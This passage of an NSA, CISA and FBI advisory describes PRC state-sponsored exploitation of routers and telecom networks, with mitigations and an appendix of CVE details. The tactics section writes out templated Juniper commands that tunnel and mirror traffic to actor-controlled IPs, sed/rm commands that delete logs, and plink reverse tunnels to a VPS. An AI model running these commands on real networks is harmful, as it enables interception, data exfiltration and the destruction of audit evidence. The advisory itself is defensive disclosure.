CVE-2018-14847 | Authentication Bypass \nNetgear | CVE-2017-6862 | RCE \nPulse | CVE-2019-11510 | Authentication Bypass \nCVE-2021-22893 | RCE \nQNAP | CVE-2019-7192 | Privilege Elevation \nCVE-2019-7193 | Remote Inject \nCVE-2019-7194 | XML Routing Detour Attack \nCVE-2019-7195 | XML Routing Detour Attack \nZyxel | CVE-2020-29583 | Authentication Bypass \n \n### Telecommunications and network service provider targeting\n\nPRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [[T1595.002](<https://attack.mitre.org/techniques/T1595/002/>)], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.\n\nUpon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [[T1078](<https://attack.mitre.org/techniques/T1078/>)] and utilized SQL commands to dump the credentials [[T1555](<https://attack.mitre.org/techniques/T1555/>)], which contained both cleartext and hashed passwords for user and administrative accounts. \n\nHaving gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [[T1119](<https://attack.mitre.org/techniques/T1119/>)]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor\u2019s infrastructure [[TA0010](<https://attack.mitre.org/tactics/TA0010/>)]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.\n\nArmed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [[T1599](<https://attack.mitre.org/techniques/T1599/>)], capture [[T1020.001](<https://attack.mitre.org/techniques/T1020/001/>)], and exfiltrate traffic out of the network to actor-controlled infrastructure. \n\nWhile other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:\n\nset chassis fpc &lt;slot number&gt; pic &lt;user defined value&gt; tunnel-services bandwidth &lt;user defined value&gt; \nset chassis network-services all-ethernet \nset interfaces &lt;interface-id&gt; unit &lt;unit number&gt; tunnel source &lt;local network IP address&gt; \nset interfaces &lt;interface-id&gt; unit &lt;unit number&gt; tunnel destination &lt;actor controlled IP address&gt; \n\n\nAfter establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.\n\nset interfaces &lt;interface-id&gt; unit &lt;unit number&gt; family inet address &lt;local network IP address subnet&gt; \nset routing-options static route &lt;local network IP address&gt; next-hop &lt;actor controlled IP address&gt; \n\n\nPRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. \n\nset firewall family inet filter &lt;filter name&gt; term &lt;filter variable&gt; then port-mirror \nset forwarding-options port-mirroring input rate 1 \nset forwarding-options port-mirroring family inet output interface &lt;interface-id&gt; next-hop &lt;local network IP address&gt; \nset forwarding-options port-mirroring family inet output no-filter-check \nset interfaces &lt;interface-id&gt; unit &lt;unit number&gt; family inet filter input &lt;filter name&gt; \nset interfaces &lt;interface-id&gt; unit &lt;unit number&gt; family inet filter output &lt;filter name&gt; \n\n\nHaving completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.\n\nsed -i -e '/&lt;REGEX&gt;/d' &lt;log filepath 1&gt; \nsed -i -e '/&lt;REGEX&gt;/d' &lt;log filepath 2&gt; \nsed -i -e '/&lt;REGEX&gt;/d' &lt;log filepath 3&gt; \nrm -f &lt;log filepath 4&gt; \nrm -f &lt;log filepath 5&gt; \nrm -f &lt;log filepath 6&gt; \n\n\nPRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [[T1572](<https://attack.mitre.org/techniques/T1572/>)] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [[T1016.001](<https://attack.mitre.org/techniques/T1016/001/>)] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.\n\nplink.exe \u2013N \u2013R &lt;local port&gt;:&lt;host 1&gt;:&lt;remote port&gt; -pw &lt;user defined password&gt; -batch root@&lt;VPS1&gt; -P &lt;remote SSH port&gt; \nplink.exe \u2013N \u2013R &lt;local port&gt;:&lt;host 2&gt;:&lt;remote port&gt; -pw &lt;user defined password&gt; -batch root@&lt;VPS2&gt; -P &lt;remote SSH port&gt; \n\n\n### Mitigations\n\nNSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:\n\n * Keep systems and products updated and patched as soon as possible after patches are released [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/>)] . Consider leveraging a centralized patch management system to automate and expedite the process.\n * Immediately remove or isolate suspected compromised devices from the network [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/>)] [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/>)].\n * Segment networks to limit or block lateral movement [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation>)]. \n * Disable unused or unnecessary network services, ports, protocols, and devices [[D3-ACH](<https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/>)] [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/>)] [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/>)]. \n * Enforce multifactor authentication (MFA) for all users, without exception [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/>)]. \n * Enforce MFA on all VPN connections [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/>)]. If MFA is unavailable, enforce password complexity requirements [[D3-SPP](<https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/>)]. \n * Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [[D3-SPP](<https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/>)].\n * Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures. \n * Disable external management capabilities and set up an out-of-band management network [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation/>)].\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation/>)].\n * Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [[D3-NTA](<https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis/>)] [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/>)].\n * Ensure that you have dedicated management systems [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening/>)] and accounts for system administrators. Protect these accounts with strict network policies [[D3-UAP](<https://d3fend.mitre.org/technique/d3f:UserAccountPermissions/>)].\n * Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/>)]. \n * Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and <https://www.nsa.gov/cybersecurity-guidance> for previous reporting on People\u2019s Republic of China state-sponsored malicious cyber activity.\n\nU.S. government and critical infrastructure organizations, should consider signing up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>), including vulnerability scanning, to help reduce exposure to threats.\n\nU.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center\u2019s DIB Cybersecurity Service Offerings, including [Protective Domain Name System](<https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/PDNS/>) (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email [dib_defense@cyber.nsa.gov](<http://www.fbi.gov/contact-us/field>).\n\n### Additional References\n\n * CISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access. <https://www.cisa.gov/uscert/ncas/alerts/aa22-137a>\n * CISA (2022) 2021 Top Routinely Exploited Vulnerabilities. <https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>\n * NSA (2021), Selecting and Hardening Remote Access VPN Solutions. [https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF ](<https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF%C2%A0>)\n * NSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs. <https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>\n * CISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. <https://www.cisa.gov/uscert/ncas/alerts/aa21-110a>\n * NSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n * CISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. [https://www.cisa.gov/uscert/ncas/alerts/aa20-258a ](<https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>)\n * NSA (2020), Performing Out-of-Band Network Management. <https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF>\n * CISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP. <https://www.cisa.gov/uscert/ncas/alerts/aa20-020a>\n * NSA (2019), Mitigating Recent VPN Vulnerabilities. <https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>\n * NSA (2019), Update and Upgrade Software Immediately. [https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf ](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf%C2%A0>)\n\n### Contact Information \n\nTo report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at [report@cisa.gov](<mailto:report@cisa.gov>). To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch at 855-292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). \n\nMedia Inquiries / Press Desk: \n\n * NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>)\n * CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov ](<mailto:CISAMedia@cisa.dhs.gov>)\n * FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### _Disclaimer of endorsement_\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### _Purpose_\n\nThis advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \n\n### Appendix A: Vulnerabilities\n\n**_Table 2: Information on Cisco CVE-2018-0171_**\n\nCisco CVE-2018-0171 CVSS 3.0: 9.8 (Critical) \n--- \n \n**_Vulnerability Description _**\n\nA vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, causing an indefinite loop on the affected device that triggers a watchdog crash. \n \n_**Recommended Mitigations **_\n\n * Cisco has released software updates that address this vulnerability.\n * In addition, the Cisco Smart Install feature is highly recommended to be disabled to reduce exposure. \n_**Detection Methods**_\n\n * CISCO IOS Software Checker \n \n_**Vulnerable Technologies and Versions**_\n\nThe vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have the smart install client feature enabled. Only smart install client switches are affected by this vulnerability described in this advisory. \n \n_**References**_\n\n<http://www.securityfocus.com/bid/103538> \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2> \n<https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04> \n[https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05](<https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04>) \n<https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490> \n<http://www.securitytracker.com/id/1040580> \n \n**_Table 3: Information on Cisco CVE-2019-15271_**\n\nCisco CVE-2019-15271 CVSS 3.0: 8.8 (High) \n--- \n \n**_Vulnerability Description _**\n\nA vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges. \n \n**_Recommended Mitigations _**\n\n * Cisco has released free software updates that address the vulnerability described in this advisory.\n * Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.\n * Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default. \n_**Detection Methods **_\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:\n\n * RV016 Multi-WAN VPN Router\n * RV042 Dual WAN VPN Router\n * RV042G Dual Gigabit WAN VPN Router\n * RV082 Dual WAN VPN Router \n \n_**References **_\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x> \n \n**_Table 4: Information on Cisco CVE-2019-1652_**\n\nCisco CVE-2019-1652 CVSS 3.0: 7.2 (High) \n--- \n \n_**Vulnerability Description **_\n\nA vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability. \n \n_**Recommended Mitigations **_\n\n * Cisco has released free software updates that address the vulnerability described in this advisory\n * This vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and later.\n * If the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure. \n**_Detection Methods _**\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20. \n \n_**References**_\n\n<http://www.securityfocus.com/bid/106728> \n<https://seclists.org/bugtraq/2019/Mar/55> \n<https://www.exploit-db.com/exploits/46243/> \n<https://www.exploit-db.com/exploits/46655/> \n<http://seclists.org/fulldisclosure/2019/Mar/61> \n[http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html](<http://seclists.org/fulldisclosure/2019/Mar/61>) \n[http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html](<http://seclists.org/fulldisclosure/2019/Mar/61>) \n[https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject](<http://seclists.org/fulldisclosure/2019/Mar/61>) \n \n**_Table 5: Information on Citrix CVE-2019-19781_**\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nAn issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_**Recommended Mitigations**_\n\n * Implement the appropriate refresh according to the vulnerability details outlined by vendor: Citrix: Mitigation Steps for CVE-2019-19781. \n * If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list). \n_**Detection Methods **_\n\n * CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.\n * Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 \u2013 Critix ADC Path Traversal #1893.\n * Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.\n * CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells. \n \n_**Vulnerable Technologies and Versions **_\n\nThe vulnerability affects the following Citrix product versions on all supported platforms:\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24\n * NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18\n * NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13\n * NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15\n * NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b \n \n_**References **_\n\n<https://support.citrix.com/article/CTX267027> \n \n**_Table 6: Information on DrayTek CVE-2020-8515_**\n\nDrayTek CVE-2020-8515 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1. \n \n_**Recommended Mitigations **_\n\n * Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible, the updated firmware addresses this issue.\n * Disable the remote access on your router if you don\u2019t need it.\n * Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so you should also temporarily disable SSL VPN until you have updated the firmware.\n * Always back up your config before doing an upgrade.\n * After upgrading, check that the web interface now shows the new firmware version.\n * Enable syslog logging for monitoring if there are abnormal events. \n_**Detection Methods **_\n\n * Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.\n * Check if any ACL (Access Control Lists) have been altered. \n_**Vulnerable Technologies and Versions **_\n\n * This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1. \n \n_**References **_\n\n<https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/> \n<http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html> \n[https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html](<http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html>) \n \n_**Table 7: Information on D-Link CVE-2019-16920**_\n\nD-Link CVE-2019-16920 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nUnauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825. \n \n_**Recommended Mitigations **_\n\n * Recommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used. \n_**Detection Methods **_\n\n * HTTP packet inspection to look for arbitrary input to the \u201cping_test\u201d command \n_**Vulnerable Technologies and Versions **_\n\n * DIR DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-82 \n \n_**References **_\n\n<https://www.kb.cert.org/vuls/id/766427> \n<https://fortiguard.com/zeroday/FG-VD-19-117> \n<https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3> \n<https://www.seebug.org/vuldb/ssvid-98079> \n \n_**Table 8: Information on Fortinet CVE-2018-13382**_\n\nFortinet CVE-2018-13382 CVSS 3.0: 7.5 (High) \n--- \n \n_**Vulnerability Description **_\n\nAn Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests. \n \n_**Recommended Mitigations **_\n\n * Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.\n * SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).\n * Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).\n * Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: config vpn ssl settings, unset source-interface, end. \n_**Detection Methods **_\n\n * HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification \n \n_**Vulnerable Technologies and Versions**_\n\nThis vulnerability affects the following products: \n\n * Fortinet FortiOS 6.0.0 to 6.0.4\n * Fortinet FortiOS 5.6.0 to 5.6.8\n * Fortinet FortiOS 5.4.1 to 5.4.10\n * Fortinet FortiProxy 2.0.0\n * Fortinet FortiProxy 1.2.8 and below\n * Fortinet FortiProxy 1.1.6 and below\n * Fortinet FortiProxy 1.0.7 and below\n\nFortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with local authentication. \n \n_**References **_\n\n<https://fortiguard.com/psirt/FG-IR-18-389> \n[https://fortiguard.com/advisory/FG-IR-18-389](<https://fortiguard.com/psirt/FG-IR-18-389>) \n<https://www.fortiguard.com/psirt/FG-IR-20-231> \n \n_**Table 9: Information on Mikrotik CVE-2018-14847**_\n\nMikrotik CVE-2018-14847 CVSS 3.0: 9.1 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nMikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface. \n \n_**Recommended Mitigations **_\n\n * Upgrade WinBox and RouterOS and change passwords\n * Firewall the WinBox port from the public interface and from untrusted networks \n**_Detection Methods _**\n\n * Use export command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS proxy settings and scripts. \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affected the following MikroTik products:\n\n * All bugfix releases from 6.30.1 to 6.40.7\n * All current releases from 6.29 to 6.42\n * All RC releases from 6.29rc1 to 6.43rc3 \n \n_**References**_\n\n<https://blog.mikrotik.com/security/winbox-vulnerability.html> \n \n_**Table 10: Information on Netgear CVE-2017-6862**_\n\nNetgear CVE-2017-6862 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nNETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices before 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the administration webapp. The NETGEAR ID is PSV-2016-0261. \n \n_**Recommended Mitigations **_\n\n * NETGEAR has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products. \n_**Detection Methods **_\n\n * HTTP packet inspection to find any specially crafted packets attempting a buffer overflow through specialized parameters. \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects the following products:\n\n * WNR2000v3 before version 1.1.2.14\n * WNR2000v4 before version 1.0.0.66\n * WNR2000v5 before version 1.0.0.42\n * R2000 \n \n_**References **_\n\n<https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261> \n<https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf> \n<http://www.securityfocus.com/bid/98740> \n \n_**Table 11: Information on Pulse CVE-2019-11510**_\n\nPulse CVE-2019-11510 CVSS 3.0: 10 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nIn Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. \n \n_**Recommended Mitigations **_\n\n * Upgrade to the latest Pulse Secure VPN.\n * Stay alert to any scheduled tasks or unknown files/executables.\n * Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files. \n \n_**Detection Methods **_\n\n * CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: [cisa.gov/check-your-pulse](<https://github.com/cisagov/check-your-pulse>).\n * Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019- 11510.nse #1708. \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects the following Pulse Connect Secure products:\n\n * 9.0R1 to 9.0R3.3\n * 8.3R1 to 8.3R7\n * 8.2R1 to 8.2R12 \n \n_**References**_\n\n<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/> \n \n_**Table 12: Information on Pulse CVE-2021-22893**_\n\nPulse CVE-2021-22893 CVSS 3.0: 10 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nPulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild. \n \n_**Recommended Mitigations**_\n\n * Updating such systems to PCS 9.1R11.4.\n * Run the PCS Integrity Assurance utility.\n * Enable Unauthenticated Request logging.\n * Enable remote logging.\n * Pulse Secure has published a Workaround-2104.xml file that contains mitigations to protect against this and other vulnerabilities.\n * Monitor capabilities in open source scanners. \n_**Detection Methods **_\n\n * Log correlation between the authentication servers responsible for LDAP and RADIUS authentication and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.\n * The Pulse Security Check Tool.\n * A \u2018recovery\u2019 file not present in legitimate versions. https://ive-host/dana-na/auth/recover[.]cgi?token=&lt;varies&gt;. \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher. \n \n_**References **_\n\n<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/> \n<https://blog.pulsesecure.net/pulse-connect-secure-security-update/> \n<https://kb.cert.org/vuls/id/213092> \n<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/> \n<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html> \n \n_**Table 13: Information on QNAP CVE-2019-7192**_\n\nQNAP CVE-2019-7192 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description**_\n\nThis improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. \n \n_**Recommended Mitigations **_\n\nUpdate Photo Station to versions: \n\n * QTS 4.4.1 Photo Station 6.0.3 and later\n * QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\n * QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\n * QTS 4.2.6 Photo Station 5.2.11 and later 